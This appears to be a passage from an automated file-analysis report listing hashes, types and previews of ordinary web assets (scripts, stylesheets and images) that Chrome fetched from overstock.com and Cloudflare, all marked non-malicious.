                                                                                                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (47531)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):47532
                                                                                                                                                                                    Entropy (8bit):5.399631966931825
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                                                                                                                                    MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                                                                                                                                    SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                                                                                                                                    SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                                                                                                                                    SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.js
                                                                                                                                                                                    Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                    Entropy (8bit):2.7773627950641693
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                    MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                    SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                    SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                    SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/ga/rul?tid=G-8MPQ3CZZFH&gacid=868463225.1730294606&gtm=45je4as0v880017861z89175873612za200zb9175873612&dma=0&gcs=G111&gcd=13n3n3n3n5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=101533421~101823848~101878899~101878944~101925629&z=1550620614
                                                                                                                                                                                    Preview:<html></html>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x1024, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):360589
                                                                                                                                                                                    Entropy (8bit):7.992778853926771
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:6144:sU8RdrvjRGSgrIPdJTHbRgGNvzotFWI5hMex5dTYRiBflPzjDJQ96Xh:s5vj8Dc15HFvNv83j5SWjvtPFw6R
                                                                                                                                                                                    MD5:99EFC55B0FCA59112B50132E847B52E2
                                                                                                                                                                                    SHA1:AD4E22826DE74378F8F37FBFCC20A8B5CD60A76F
                                                                                                                                                                                    SHA-256:F119D1E81B20ED8BB6833579057CCDB3E82F88B891413F51F411A4677DAED54A
                                                                                                                                                                                    SHA-512:95E67B516F194587720321CE9D7094E51FB54A218B541920C69779E2E65D0107CB557F06BDEBD189C2975785661308879D703401774EC0754695FC30EFA0572A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..........................................................................................................................................................."..........;............................................................................k.)R.C.....S..9c+\!.%82..J.M.(c..A.).U.y2.+..4.....K.8.-).I4..[8R.dI(.D..X*.E..v-.A......A...kdD..x[..4>p.f.sP...H\..7`....f.,....n..+..$....#|.2I..g....I5.Ht.#.^eH........I8.U.$.u......I#....{.I.`##$....$......t@.F..9.."..#..)....9.....3K..}A..i..*.3{.U.~..vb.C..n&ao.x...@4..h..k.. z..C1.c.P.O_s.....~..G]$.r..),.| KweSW6aJK9... .....$.q.4..F.....)....r.....%c`..cU......4.....N.0I/<R.A.;.H...u.eA 3u9..}6.Od!._..Q......Rp....>...5.......`yk&z.I.........I...ZH..............C$ S.. ..IRO.U.I8.^.=.d.O&.jTjM!..C...XVQ..*..I.*.N.CZ...H..|'@.......^...4...;.\..6....0.av.M/)^C>........jx..7.\..o....)..e..>.x.aw|...n.-.v`Pe..s...wx.JWH..[.....n..`.|.,.G*....0.p{2...Q..U5.."...?.-.k...O..j.a...a...S/.s.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):3.990210155325004
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                                                                                                                    MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                                                                                                    SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                                                                                                    SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                                                                                                    SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                                                                                                                                                    Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (3079)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3179
                                                                                                                                                                                    Entropy (8bit):4.952525455829565
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:wvIjWqYeq9hPPhWnFtUg4oyV7uTU+PFTixxN2F8:GIjLLUPaFmg4NJuTU+P5EwF8
                                                                                                                                                                                    MD5:8E7FE97F4668E129C95D04872804F361
                                                                                                                                                                                    SHA1:C829F839086DED40A2E36C07443ED390E1D9BA98
                                                                                                                                                                                    SHA-256:C2F4EA64C6DED112699F711949679CE3E9C9629694B24A0BCC60EEB4BA3F575C
                                                                                                                                                                                    SHA-512:E2219856A1B3BB1509EAF0DFA06B0041FA00D6D8A437A011CE7077C2B66C874653AC21D74861BADDB58EB54A1F655806EE32B66222011603A4FB0C45EF456EDA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/product-page.css?v=7214178851081366811730157903
                                                                                                                                                                                    Preview:.product-main .product-media{margin-top:calc(5 * var(--space-unit));margin-bottom:calc(5 * var(--space-unit))}.product-details__calc .h4{margin-bottom:1.1em}@media (min-width: 769px){:root{--product-column-padding: calc(8 * var(--space-unit));--product-info-width: 47%}.shopify-section:not(.product-details){clear:both}.product-breadcrumbs .breadcrumbs{width:calc(100% - var(--product-info-width));padding-inline-end:var(--product-column-padding);overflow:hidden}.product-breadcrumbs+.product-main .product-media,.product-breadcrumbs+.product-main .product-info{padding-top:0}.product-breadcrumbs+.product-main .product-info:before,.product-breadcrumbs+.product-main .product-info:after{top:calc(-10 * var(--space-unit) - 1em - 2px)}.shopify-section+.product-main{margin-top:-1px}.shopify-section+.product-main:before,.product-details+.shopify-section:before,.product-main+.shopify-section:not(.product-details):before{content:"";display:block;position:relative;z-index:-1;width:100%;height:1px;backg
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (23487), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):23487
                                                                                                                                                                                    Entropy (8bit):5.145866643302827
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:8O6kdkRxaGYYasNLf9QMkOZWX4OyBtdCbcM0RKwtWYnxkZjw:8O6k+xXjLf9syJdGcZEwtWYnxkZjw
                                                                                                                                                                                    MD5:7C0F2E193E2413FEF62F1E62FBAB9B94
                                                                                                                                                                                    SHA1:02FFB0069243CE265E8CCB398E08F8F872469BC4
                                                                                                                                                                                    SHA-256:AC25781BCCDC051A8E6945ECDF68922E04E7F75154CC857371461ECFE1111815
                                                                                                                                                                                    SHA-512:113B0E742CE3C1CAF13058E0CE6160510B56AA18ED7E0751A47AE0228E3D9AAA1064448CB0FB842872076A0B1DB3EACA96592FED8434BD36072A6446AB0CF49F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:!function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var o in t)n.d(r,o,function(e){return t[e]}.bind(null,o));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=361)}({152:function(t,e){!function(){if("function"==typeof window.CustomEvent)return!1;window
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3363
                                                                                                                                                                                    Entropy (8bit):7.38503237920733
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/XrxKdypr/rQFRgTk1d68OTM/p5BPfQzIwi:N22Er/r0g41d68Og/TpfQRi
                                                                                                                                                                                    MD5:3FC0CC63D3E5F3D0C8E18AF06CFA34CB
                                                                                                                                                                                    SHA1:A1CC56EC2797536DF0822AFF99F897DA1422CF9A
                                                                                                                                                                                    SHA-256:EE7A9C630676F425534D0B7615FD629AE5A2B36749AC6BF9C210155BF26DBD23
                                                                                                                                                                                    SHA-512:FEC0B3BD66F202027A49AC4CD6A9738D5B1580A02793546CD8934952C959FA840805742B4F1D2AA6A20FCE6420C63D9C3AAD42279397394F792DBBAF45232EC7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................6+.J.`...>'.......J..vY..z..\.>.&F..2..9z..-3h.......;.;...@..H:.mQ.m....{.D....0.@.y...........zvcz4.....a0X..$...O......T....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):456599
                                                                                                                                                                                    Entropy (8bit):5.373039843710787
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:EZ3lY37vavSZea94/jXfG2a7tPTBB7NthgxtzbP+y3b66AP+vntozbHXH5pbo/bY:Eh29woj59
                                                                                                                                                                                    MD5:7290D3206A25D0C9B38B2FA246038ECD
                                                                                                                                                                                    SHA1:FB4E12DB24C9D0DDB7CD556A6533715E74962EC7
                                                                                                                                                                                    SHA-256:F929B9E192EBC87DCA227C0E891B55B5DB21345E31FF3232484055037315C59A
                                                                                                                                                                                    SHA-512:1378BA0728563DE7D3105E91B63FFC934E2A21FF3914BD22626B03EFB510B254668BD93B0DD290E45E19D2B8FE1B2D30124443220D50DAF42DA0159AD128B1AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={598:(e,t,n)=>{var r="undefined"!=typeof globalThis?globalThis:"undefined"!=typeof window?window:void 0!==n.g?n.g:"undefined"!=typeof self?self:{};var i,o,a=(i=function(e){(function(){!function(t,n){if(e.exports){var r=n();e.exports=r,e.exports.default=r}else if(t.appboy){var i,o=n();for(i in o)t.appboy[i]=o[i]}else t.appboy=n()}("undefined"!=typeof self?self:this,(function(){var t,n={};function i(e){var t=0;return function(){return t<e.length?{done:!1,value:e[t++]}:{done:!0}}}function o(e){var t="undefined"!=typeof Symbol&&Symbol.iterator&&e[Symbol.iterator];return t?t.call(e):{next:i(e)}}var a,s="function"==typeof Object.create?Object.create:function(e){function t(){}return t.prototype=e,new t},c="function"==typeof Object.defineProperties?Object.defineProperty:function(e,t,n){return e==Array.prototype||e==Object.prototype||(e[t]=n.value),e},u=function(e){e=["object"==typeof globalThis&&globalThis,e,"object"==typeof window&&window,"object"==typeof self&&self,"object"==type
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3785
                                                                                                                                                                                    Entropy (8bit):7.4940448166096445
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/Xrx0CMU+HhTVbF/lfuTnCjYtalzW1RWTwy4w:N2iCwHhhbxB7YUFCgwy4w
                                                                                                                                                                                    MD5:7FAFF19E386BB3E4416A9890D17A9668
                                                                                                                                                                                    SHA1:2C4870EFCCC174551C58DA63CD9D67447DCB6A18
                                                                                                                                                                                    SHA-256:B443BC34B6B2B5CB245B56525708D24F9FD0296E9B730B6A970D7125F3A47005
                                                                                                                                                                                    SHA-512:7A0CA1BE4A9012E4107FFA2A2137074BDF436D39A23BACEAD34097AD4AD4121C31810CF6AC3FBE8917A24409768B0B7C6BA18F7FC8EC431E49D581F21F771085
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P..................................................................................z...E.l.+.Fd......../...9.......(.:...'.}...}....we..\.^..WO/&y.gQ/...I..fC..I~...<.`.....m.....|]3..KhQ....".!.9.4.Eh..l...,..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 650x650, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):95321
                                                                                                                                                                                    Entropy (8bit):7.958352953366531
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:oVKfVOc5mttgLpGj4WfZ1yPxIltaCVnvYnW8xEZZcOXEK91rS9mA6gR09gp:oMfH82dGj4eZQPxO9VvItEZZLXEe1rHc
                                                                                                                                                                                    MD5:5E8E0E6B724742155DD8547364390B35
                                                                                                                                                                                    SHA1:87A9B8630069EADE53B1251079342E46F2A23240
                                                                                                                                                                                    SHA-256:D307918F9AAB2170C59BD33C4E336CFDF0218AB0BE317275B1997E07F4CFD150
                                                                                                                                                                                    SHA-512:BFDB763343219FADDB642AFD90F0EB7CF604D6AE3D394946FF4E8B4DCB7E094B42E93BECBF26972845EF22B5B33661BAD904F79764A5F86B0FDADA50CEC4BB0F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..............................................................................................m....&Q.......(..B.......+..%..*.4.,..*......l.....2B..5 .....=.....E.Y.!....(..M@.IE...9...{.....u....V....P.....-.".....@..Q.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1006
                                                                                                                                                                                    Entropy (8bit):4.836413942661106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:2oUChUCKwVbV8Hno8/TnUn+fmLoaiuHc1deB/:dZhZKhHnoibUn2mLU1deB/
                                                                                                                                                                                    MD5:6E0DC54411BDE95A291A6933C2C63209
                                                                                                                                                                                    SHA1:F30E131D08E18B436566A0DD51FFC008E3AE42EA
                                                                                                                                                                                    SHA-256:3B20F1DC4E3B8C38FCB0F84DE3F9379124802EA313DAA293382E71DA116042B8
                                                                                                                                                                                    SHA-512:DB673798EA8D75A153ADCF2EADFFF0C21184CB6862F3A6D642948C3AB1442E1FBF64F217D5761BC7F5207355C065518ED6B15AF4E1DED19DD72A7F090FF5D147
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://assets.tapcart.com/__tc-ck-loader/index.js?appId=CeeweiHh1L&environment=production&shop=a37a28-2.myshopify.com
                                                                                                                                                                                    Preview:(function () {. const { currentScript } = document;. const script =. new URL(currentScript.src) || new URL(currentScript.getAttribute("src"));.. const appId = script.searchParams.get("appId");. const environment = script.searchParams.get("environment");.. const srcUrls = {. local: "http://localhost:3005/dist/tc-plugins.es.js", // local dev server URL defined in vite.config.js. staging:. "https://unpkg.com/tapcart-capture-kit@staging/dist/tc-plugins.es.js",. production:. "https://unpkg.com/tapcart-capture-kit@production/dist/tc-plugins.es.js",. };. const srcUrl = srcUrls[environment] || srcUrls.production;.. window["tapcartParams"] = { appId, environment };.. // Create a new script element with type module. const moduleScript = document.createElement("script");. moduleScript.type = "module";. moduleScript.src = srcUrl;. document.head.appendChild(moduleScript);.. moduleScript.onerror = function () {. console.error("The script failed to load.");. };
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, from Unix, original size modulo 2^32 109
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):121
                                                                                                                                                                                    Entropy (8bit):5.8560255601330455
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FttXz673HKnQ2OmYcDBAymRdgee1yqBqACnwyRZGHm4up5XyN7n:Xtj6zHKJKcdAykGXsAATD9JyN7n
                                                                                                                                                                                    MD5:CA7366E3E08A5F2B9CAAAB7DAA8757B1
                                                                                                                                                                                    SHA1:9CCD37E55FCC8A0D8BFA2D04CF2ABA3907C2CF51
                                                                                                                                                                                    SHA-256:3C7B695721ABBBFCD88877381B0E3A2F00D19B71E7F50E2540E407A25656432E
                                                                                                                                                                                    SHA-512:FD56DD96325DB11A2941AEC9CBAAC2BD7698BF83B4F094D958FBD014C758D302962B1C27A589F0783F1B5B511F261EAAA46F7AF3B673CDEC81DBAA5E0BA944DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...........V*.I,)-V.Rrrt..r..u..Q.Q*...M,....&....(x...)............'.....A..rSK2.S...]C..2....K..K...JRS.j...>qm...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:gzip compressed data, was "main.97c41ef3.js", last modified: Fri Aug 23 15:57:59 2024, from Unix, original size modulo 2^32 83598
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):27512
                                                                                                                                                                                    Entropy (8bit):7.993187350119009
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:768:CsfAgqyshviKsrws/XBA/GaFemZwlZwwjBBJKaduJDp:jogqyshv/srwgoGaFN23jP4wiN
                                                                                                                                                                                    MD5:0304D337D72A7B17907261BF86E2F221
                                                                                                                                                                                    SHA1:D56F37B6686036EE3945D877BAF2849245073FCE
                                                                                                                                                                                    SHA-256:F8501D2AAB7B556B8D8A56E8F7C6E9E21D01204249AC6D43470015AA86E2A5A7
                                                                                                                                                                                    SHA-512:6D15FC21EFD7CB6BDD2924CB9C16E1B8ABF070AFBA1C63B7FAF998A1CB7ACB3A0CAD5F52EC27EE8763328669F40AD50CA32D62A2E94AF4073218C5DC4B79FFA3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.......f..main.97c41ef3.js..\.o...*...b%...8.,.h{3`.[;,.... Pl:..Py..47.>.;..%..4....D......?.C.`Y.HRn3.p.g..>l.....B5.i.D.q;;...)^.$..:<.]..&.D.>l...G.y.^.|X......7kz...M....pN3....2./..d..%.l>_...b.`.._..e.^v{`..fY|.f!..b"d[..z.A.<X.Wo/..*.oX...__..~_....Td...._..]#..u.]../.X3kK......<.R.(..8....E...Nl`.{..D..,.<..S+.#XTO........."2ZB.g,....zM......(s-h....v...s.c q..5K9Y..-........2.\....f;.L.B.r3BJ..1d.o,..I.c.a1..T..$..6ly....w....r9..6.z...M....6\...;.y..._@.7.....S.'[.. ..........lz.;.....O....#......J..._...._..................|4>.M.G.......q0.V./..`.R.Xe.]....o1.b'Y..f..au.E.....Y...._..U-L..H........J...Br..j>...V............((A.{UY..}`....U....".s....t@.W$P.-..K...ZiVf#...Z.v.`..4..=.......B~...2.......L.\.'.@...].pw.zq..^..(.'..3.........4)L.,....<-.UT^.).XD.x...e`ML..O..&T..r.......{.~.......-Q.!s...2g..20-D.F.L.Xn.].Q...f..RJ.ZI.lN.m......~u..v.7%.#....m.Pn.v$4....v..M........>gT...0....Y%.).6s;+......vA.v.d.Z...p...C....x..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2014
                                                                                                                                                                                    Entropy (8bit):6.761205955130666
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYvRQyJa6Zoegs8Pfxy+oJXXjjh7uP8qlvEqwnSOc1E3u:NBIl/XflVxmBywmfE+kIpvvjGu
                                                                                                                                                                                    MD5:3B50CFB666234967BF7530DA9DC608ED
                                                                                                                                                                                    SHA1:57B5DE1E1242AD2BEB44951F0643B09D01C4C1C2
                                                                                                                                                                                    SHA-256:CDE8CAD6E7FEA28F4D6715C5BED2F6023DF20A6F444E2F216ED917C94A298693
                                                                                                                                                                                    SHA-512:5AF1B5FECED1CF8F9FF5399D2BDE2DEB64C15B9E231E5F7EA0E42E15458F62F169B477F2090ECA7A0146FF67907AA370477A8F419757741ECEC28C53143793A4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................X...........y.l..EK.RaV.:.Zo|u...p}....%.ZXR..c.....,G=K.<....,...k.........9.,.77a.h..e...............3..........................!..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):218707
                                                                                                                                                                                    Entropy (8bit):5.349049978644253
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:0n31oAwV0qlurW8Vh3e2Qgo/hhER3+M2S0ppIja6/iVK:0nlMurW8L3DQgo/XER3+M23ppIja6/cK
                                                                                                                                                                                    MD5:58924EAACE36350A280F4133E492B2EE
                                                                                                                                                                                    SHA1:6F353DDD6838D004ECF1D54B44A57A58BA6B2E51
                                                                                                                                                                                    SHA-256:6A82CC364E18036FE5373B8D7B688ACF5F6FAFF55A3A5580EE3A5F27070B7D90
                                                                                                                                                                                    SHA-512:A78CD042740B4F2334E171091D1553FAB99A2252C87C1A0227CDA3258038BD5243B1CC8AAE16E8572C258D908210527D9CE2906AD9887C78E056E6D468EBE183
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shopifycloud/portable-wallets/latest/portable-wallets.en.js
